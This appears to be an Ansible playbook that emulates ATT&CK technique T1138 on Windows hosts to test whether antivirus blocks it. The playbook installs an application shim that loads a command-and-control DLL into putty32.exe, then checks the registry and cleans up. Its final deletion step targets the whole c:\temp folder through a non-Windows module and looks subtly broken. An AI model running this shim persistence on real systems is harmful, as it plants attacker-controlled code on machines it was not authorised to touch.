# attack_technique: T1138
# putt32 bit version is used here
- name: T1138 - Application Shimming
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: copy putty32 bit version
      tags: always
      win_copy:
        src: /opt/ansible/putty32.exe
        dest: c:\temp\
    - name: copy dll
      tags: always
      win_copy:
        src: /opt/ansible/{{ cnc_dll }}
        dest: c:\temp\
    - name: copy sdb file
      tags: always
      win_copy:
        src: /opt/ansible/puttyfix32.sdb
        dest: c:\temp\
    - name: install shim
      win_command: |
        sdbinst -q c:\temp\puttyfix32.sdb    
      register: shim
    #- name: Execute putty32
    #  tags: always
    #  win_command: |
    #    cmd.exe /k c:\temp\putty32.exe
        
    - name: sleep for 10 seconds and continue with play to check if AV removed or Not
      tags: always
      wait_for: timeout=10
      delegate_to: localhost

    - name: Check REG exist
      tags: always
      win_reg_stat:
        path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\putty32.exe
      register: T1138
    - name: check if playbook was blocked
      tags: always
      debug: msg="Playbook Completed#T1138#blocked#win#"
      when: T1138.exists == False        
    - name: check if playbook was successfull
      tags: always
      debug: msg="Playbook Completed#T1138#passed#win#"
      when: T1138.exists 
      
    - name: cleanup uninstall   
      tags: always
      win_command: |
        sdbinst -q -u c:\temp\puttyfix32.sdb
      when: T1138.exists 
      
    - name: delete files
      tags: always
      file:
        path: c:\temp
        state: absent
      with_items:
        - puttyfix32.sdb
        - putty32.exe
        - "{{ cnc_dll }}"
